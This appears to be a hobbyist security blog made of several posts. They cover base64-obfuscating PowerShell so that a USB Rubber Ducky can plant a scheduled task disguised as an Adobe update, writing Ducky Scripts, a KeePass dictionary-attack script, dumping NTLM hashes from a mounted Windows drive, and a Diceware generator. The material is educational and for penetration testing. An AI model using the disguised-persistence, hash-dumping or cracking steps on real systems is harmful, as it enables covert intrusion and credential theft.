Obfuscating PowerShell Commands

I recently wrote a Ducky Script that creates a scheduled task upon plugging a Rubber Ducky into an unlocked PC. While the script is successful, I find it gives away too many clues as to what the script is doing.

PowerShell commands can be obfuscated using base64. These commands can be submitted to PowerShell using the the EncodedCommands parameter. While designed to be used to submit commands to PowerShell that require complex quotation marks or curly braces, it can also be used in an attempt to hide what commands a script is running.

The PowerShell commands my Ducky Script runs are as follows:

$action = New-ScheduledTaskAction -Execute 'wlrmdr.exe' -Argument " -s 60000 -f 1 -t You've Been Pwned! -m Remember that USB you plugged in? Pepperidge Farm Remembers. -a o"

$trigger = New-ScheduledTaskTrigger -Daily -At 3:14pm

Register-ScheduledTask -Action $action -Trigger $trigger -TaskName "Adobe Acrobat Update Tusk" -Description "This task doesn't keep your Adobe Reader and Acrobat applications up to date with the latest enhancements and security fixes"

This is a benign script that will remind the victim daily that they plugged in an unknown USB stick. I also had the scheduled task kind of hide itself as the Adobe Reader Update Task in an attempt to avoid being discovered later on.

Before getting started, PowerShell will need to know that it is to run all these commands together. This can be done using a semicolin (;). Simply put a semicolon between each command like so:

$action = New-ScheduledTaskAction -Execute 'wlrmdr.exe' -Argument " -s 60000 -f 1 -t You've Been Pwned! -m Remember that USB you plugged in? Pepperidge Farm Remembers. -a o";$trigger = New-ScheduledTaskTrigger -Daily -At 3:14pm;Register-ScheduledTask -Action $action -Trigger $trigger -TaskName "Adobe Acrobat Update Tusk" -Description "This task doesn't keep your Adobe Reader and Acrobat applications up to date with the latest enhancements and security fixes"

To convert the commands to base64, add the commands to a variable with a name of your choice. It my case I’ve gone with $EncodeText. It will also be important to use the backtick on the variables and some of the quotations.

$EncodeText = "`$action = New-ScheduledTaskAction -Execute 'wlrmdr.exe' -Argument `" -s 60000 -f 1 -t You've Been Pwned! -m Remember that USB you plugged in? Pepperidge Farm Remembers. -a o`";`$trigger = New-ScheduledTaskTrigger -Daily -At 3:14pm;Register-ScheduledTask -Action `$action -Trigger `$trigger -TaskName `"Adobe Acrobat Update Tusk`" -Description `"This task doesn't keep your Adobe Reader and Acrobat applications up to date with the latest enhancements and security fixes`""

The commands can now be encoded in base64 by running the following command:

[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($EncodeText))

The base64 text will be displayed on the screen.

JABhAGMAdABpAG8AbgAgAD0AIABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAQQBjAHQAaQBvAG4AIAAtAEUAeABlAGMAdQB0AGUAIAAnAHcAbAByAG0AZAByAC4AZQB4AGUAJwAgAC0AQQByAGcAdQBtAGUAbgB0ACAAIgAgAC0AcwAgADYAMAAwADAAMAAgAC0AZgAgADEAIAAtAHQAIABZAG8AdQAnAHYAZQAgAEIAZQBlAG4AIABQAHcAbgBlAGQAIQAgAC0AbQAgAFIAZQBtAGUAbQBiAGUAcgAgAHQAaABhAHQAIABVAFMAQgAgAHkAbwB1ACAAcABsAHUAZwBnAGUAZAAgAGkAbgA/ACAAUABlAHAAcABlAHIAaQBkAGcAZQAgAEYAYQByAG0AIABSAGUAbQBlAG0AYgBlAHIAcwAuACAALQBhACAAbwAiADsAJAB0AHIAaQBnAGcAZQByACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBUAHIAaQBnAGcAZQByACAALQBEAGEAaQBsAHkAIAAtAEEAdAAgADMAOgAxADQAcABtADsAUgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AQQBjAHQAaQBvAG4AIAAkAGEAYwB0AGkAbwBuACAALQBUAHIAaQBnAGcAZQByACAAJAB0AHIAaQBnAGcAZQByACAALQBUAGEAcwBrAE4AYQBtAGUAIAAiAEEAZABvAGIAZQAgAEEAYwByAG8AYgBhAHQAIABVAHAAZABhAHQAZQAgAFQAdQBzAGsAIgAgAC0ARABlAHMAYwByAGkAcAB0AGkAbwBuACAAIgBUAGgAaQBzACAAdABhAHMAawAgAGQAbwBlAHMAbgAnAHQAIABrAGUAZQBwACAAeQBvAHUAcgAgAEEAZABvAGIAZQAgAFIAZQBhAGQAZQByACAAYQBuAGQAIABBAGMAcgBvAGIAYQB0ACAAYQBwAHAAbABpAGMAYQB0AGkAbwBuAHMAIAB1AHAAIAB0AG8AIABkAGEAdABlACAAdwBpAHQAaAAgAHQAaABlACAAbABhAHQAZQBzAHQAIABlAG4AaABhAG4AYwBlAG0AZQBuAHQAcwAgAGEAbgBkACAAcwBlAGMAdQByAGkAdAB5ACAAZgBpAHgAZQBzACIA

This can now be fed into PowerShell using the EncodedCommand parameter. You can pipe the command to Out-Null to have the command run without any output:

PowerShell -EncodedCommand JABhAGMAdABpAG8AbgAgAD0AIABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAQQBjAHQAaQBvAG4AIAAtAEUAeABlAGMAdQB0AGUAIAAnAHcAbAByAG0AZAByAC4AZQB4AGUAJwAgAC0AQQByAGcAdQBtAGUAbgB0ACAAIgAgAC0AcwAgADYAMAAwADAAMAAgAC0AZgAgADEAIAAtAHQAIABZAG8AdQAnAHYAZQAgAEIAZQBlAG4AIABQAHcAbgBlAGQAIQAgAC0AbQAgAFIAZQBtAGUAbQBiAGUAcgAgAHQAaABhAHQAIABVAFMAQgAgAHkAbwB1ACAAcABsAHUAZwBnAGUAZAAgAGkAbgA/ACAAUABlAHAAcABlAHIAaQBkAGcAZQAgAEYAYQByAG0AIABSAGUAbQBlAG0AYgBlAHIAcwAuACAALQBhACAAbwAiADsAJAB0AHIAaQBnAGcAZQByACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBUAHIAaQBnAGcAZQByACAALQBEAGEAaQBsAHkAIAAtAEEAdAAgADMAOgAxADQAcABtADsAUgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AQQBjAHQAaQBvAG4AIAAkAGEAYwB0AGkAbwBuACAALQBUAHIAaQBnAGcAZQByACAAJAB0AHIAaQBnAGcAZQByACAALQBUAGEAcwBrAE4AYQBtAGUAIAAiAEEAZABvAGIAZQAgAEEAYwByAG8AYgBhAHQAIABVAHAAZABhAHQAZQAgAFQAdQBzAGsAIgAgAC0ARABlAHMAYwByAGkAcAB0AGkAbwBuACAAIgBUAGgAaQBzACAAdABhAHMAawAgAGQAbwBlAHMAbgAnAHQAIABrAGUAZQBwACAAeQBvAHUAcgAgAEEAZABvAGIAZQAgAFIAZQBhAGQAZQByACAAYQBuAGQAIABBAGMAcgBvAGIAYQB0ACAAYQBwAHAAbABpAGMAYQB0AGkAbwBuAHMAIAB1AHAAIAB0AG8AIABkAGEAdABlACAAdwBpAHQAaAAgAHQAaABlACAAbABhAHQAZQBzAHQAIABlAG4AaABhAG4AYwBlAG0AZQBuAHQAcwAgAGEAbgBkACAAcwBlAGMAdQByAGkAdAB5ACAAZgBpAHgAZQBzACIA | Out-Null

You can now run Obfuscated PowerShell Commands the way your inner PowerShell Ninja intended.

Check out the Ducky Script on GitHub!

USB Rubber Ducky

I purchased a USB Rubber Ducky from Hak5 a few years back and it has been sitting in the office collecting dust ever since. A USB Rubber Ducky is a device that looks like a USB Flash Drive but thinks its a keyboard. When plugged into a computer, a USB Rubber Ducky can start typing commands. Because it is able to type commands a lot quicker than you or I, the USB Rubber Ducky can be a handy tool for automating a task, or for quickly installing a remote backdoor during a physical penetration test.

Let’s get some remote shells!!

Instead of jumping right into loading a remote shell (sorry for the misleading heading), I will start small; how to write a basic “Ducky Script” and how to encode it and load it onto the USB Rubber Ducky.

For this task, I am working on Ubuntu and creating a USB Rubber Ducky to “attack” a Windows PC.

First things first, Lets start by setting up a working directory. On Ubuntu we can do that with the following commands:

mkdir ~/RubberDucky/
mkdir ~/RubberDucky/scripts

Now change directory to RubberDucky with the following command:

cd ~/RubberDucky

Let move onto downloading the require tools.

Duckencoder

Hak5 provide the tools required to encode the Ducky Script text files into a bin file that can be used by the Rubber Ducky. Before we can run Duckencoder we will need to install the java runtime environment. This can be done with the following command:

sudo apt install default-jre

Once this has installed, it is time to download duckencoder. We have already changed into our RubberDucky directory, so we can go ahead and download the tool. Do that with the following command:

wget https://github.com/hak5darren/USB-Rubber-Ducky/raw/master/duckencoder.jar

Creating basic Ducky Script

My basic script is inspired by the Matrix. It’s not very elaborate, it just opens Notepad on Windows and displays a message to the users.

To get started lets create a blank text file and open it with our favourite text editor.

touch ~/RubberDucky/scripts/HelloWorld.txt && vi ~/RubberDucky/scripts/HelloWorld.txt

Now enter the text below. If you are not familiar with Vim, you will need to press i to enter the insert mode before you can enter the text.

REM Ducky Payload inspired by The Matrix
DELAY 500
GUI r
DELAY 500
STRING notepad.exe
ENTER
DELAY 500
STRING Wake up User.
ENTER
STRING The Matrix has you.
ENTER
STRING Follow the Rubber Ducky.
ENTER

To save the file and exit Vim, press escape to go back to command mode and the type :wq and press enter.

Other Scripts are available from Hak5.

Encoding the Ducky Script

Before we can load the script onto the USB Rubber Ducky, we will need to encode the file with the Duckencoder tool we downloaded earlier. This is a simple process and can be done using the command below:

java -jar duckencoder.jar -i ~/RubberDucky/scripts/HelloWorld.txt -o inject.bin

Essentially we are using java to run duckencoder, taking the text file as an input (-i) and setting the output (-o) as the bin file.

Once this completes you will see the inject.bin file in the ~/RubberDucky directory. This can be transferred over to a Micro SD card and inserted into your RubberDucky. This can be now plugged into a Windows PC for a little bit of non-malicious fun.

Python 3 KeePass Dictionary Attack

Github: https://github.com/0x6A6F7368/KeePassDictionaryAttack

A few years back I created a python script for a class I was teaching on password security. It is a basic script to run a dictionary attack against a KeePass database. Being that Python 2.7 EOL date is quickly approaching, I thought I might change my script to suit Python 3 – and do a quick blog post on how to run the new script.

First of all you will need to download and install the libkeepass module. This can be done using pip. If you haven’t installed pip3 you will need to do this first.

sudo apt-get install python3-pip
pip3 install libkeepass

Create a directory to store the script, and then change into the newly created directory.

cd ~ && mkdir keepassdictionaryattack
cd keepassdictionaryattack

You can supply your own password list as password.txt or download one of the many available online. I am using the 500 worst passwords list I found on Daniel Miessler’s GitHub.

Download the passwords and rename the file to passwords.txt

curl -O https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Common-Credentials/500-worst-passwords.txt

mv 500-worst-passwords.txt passwords.txt

Now, download the KeePass Dictionary Attack script.

curl -O
https://raw.githubusercontent.com/0x6A6F7368/KeePassDictionaryAttack/master/KeePassAttack.py

Copy a KeePass database into ~/keepassdictionaryattack and then run the script.

python3 KeePassAttack.py

If the KeePass database is using a weak password, you may gain access to the database and all the goodies inside.

Diceware Passphrase Generator

Update:

Python 3 Version can be found on GitHub.

Diceware Passphrase Generator – Python 2.7

It has been a while since I have done anything with Python so as a quick easy ‘get back into it’ I though I would create a Diceware Passphrase Generator. This is not a truly secure implementation as I am only using the python random function, as this quote from the Python Document Library explains:

Warning: The pseudo-random generators of this module should not be used for security purposes. Use os.urandom() or SystemRandom if you require a cryptographically secure pseudo-random number generator.

diceware passphrase

I will be modifying the script to use the os.urandom() function and will post it here when I do.

The wordlist I used can be found here; more information about Diceware Passphrases can be read here.

And here is the code:

import random

def dicenumber():
    diceout = ""
    for i in range(5): # 5 dice rolls
        diceout += `random.randint(1,6)` # add result of dice roll to variable
    return diceout

def diceware(x):
    wordlist = open('diceware.wordlist.asc', 'r')
    for line in wordlist:
        if line.startswith(x):
            wordlist.close()
            return line

for i in range(4): print diceware(dicenumber()), # increase number for longer passphrases

Dumping NTLM Hashes

Since discovering Hashcat, password cracking has become somewhat of a hobby of mine – even enough to buy the first video card in about 15 years (not much of a modern gamer)

Although the card is nothing flash – GT750 – it does the job. We all start small.

Having physical access to a machine most likely means you will not need to crack a password to gain access to data on the device (bootable Linux USB) but sometimes its all about knowing the password itself. The password could be the keys to the kingdom.

And I am curious about what people pick for passwords. I am kind of pasionate about password security.

I do get clients on a daily basis who have forgotten passwords for their home Windows machines, and while I can easily backup their data, I like to also tell them that their password was Petsname1 (or some other “creative” conconcton) and that its time to start using more secure passwords. Because reasons.

Grabbing a NTLM hash is as easy as Backbox, Bkhive, Samdump2…

The reason I use Backbox is I find it boots on everything I need it to boot on. And the reason I used bkhive to dump the system key rather than just using samdump2 to dump key and hash is that is was not dumping properly and I was getting incorrect keys, and incorrect/uncrackable hashes. Im just showing the way that works for me.

Getting the Hash

  1. Boot up from Bootable BackBox USB
  2. Open Terminal
  3. Mount victim hard drive
  4. Change directory to directorywheredrivewasmounted/Windows/System32/config
  5. type in bkhive SYSTEM key.txt – now from a forensic point of view this is going to make a file right there in the config folder that someone could possibly find later on – even if you delete
  6. type in samdump2 SAM key.txt > hashes.txt – again from a forensics point of view this file is being written to the local drive and could be discovered later on

You now have a file, hashes.txt, that contains the hashed password of each user from that machine.

KeePass Dictionary Attack

Update

Python 3 version can be found on GitHub.

Updated page can be viewed here.

KeePass Dictionary Attack – Python 2.7

import libkeepass

filename = 'sample.kdbx' # Enter name of keepass database
f = open('passwords.txt') # Enter name of password list

for line in f:
    line = line.strip()
    try:
        with libkeepass.open(filename, password=line) as kdb:
            print '\n \n Password has been found. Your password is ' + `line`
            break
    except IOError:
        print 'Trying password:  ' + line

I wrote this script for a class I was teaching on using Password Managers. Even though we were implementing a Password Manager, some students still insisted on using simple passwords, thus leaving their password manager vulnerable to a simple dictionary attack. It is by no means an elaborate script, but was enough to outline to my students why we should use strong passwords to protect sensitive data.

Keepass Dictionary Attack
The KeePass Dictionary Attack script displaying the password found for a KeePass database.

To use this script you will need access to a wordlist. There are many wordlists around and a quick Google search for ‘wordlist’ will link you to several. A list of the top 500 worst passwords can be found here.

You will also need to download and install the libkeepass module. To install this module you may also need to download Microsoft Visual C++ compiler for Python 2.7.

The KeePass Dictionary Attack script will cycle though the lines of the password list and then display the password if it finds a match. This password will then let you open an view passwords stored in the database. Currently, there is no message displayed if the password isn’t found.

Protecting yourself

A KeePass dictionary using the default values can be attacked a fairly reasonable pace – depending on the speed of the attacking PC of course.

To help protect against a KeePass Dictionary Attack you can try some of the options found here – this doesn’t prevent an attacker running this script but does dramatically slow the attacker down.

Dictionary Attack

A dictionary attack is when an attacker uses a wordlist of common passwords to attempt entry into your account/devices/files/etc. This is often successful due to people using simple dictionary words for passwords – to avoid this kind of attack ensure you use long, unique passwords.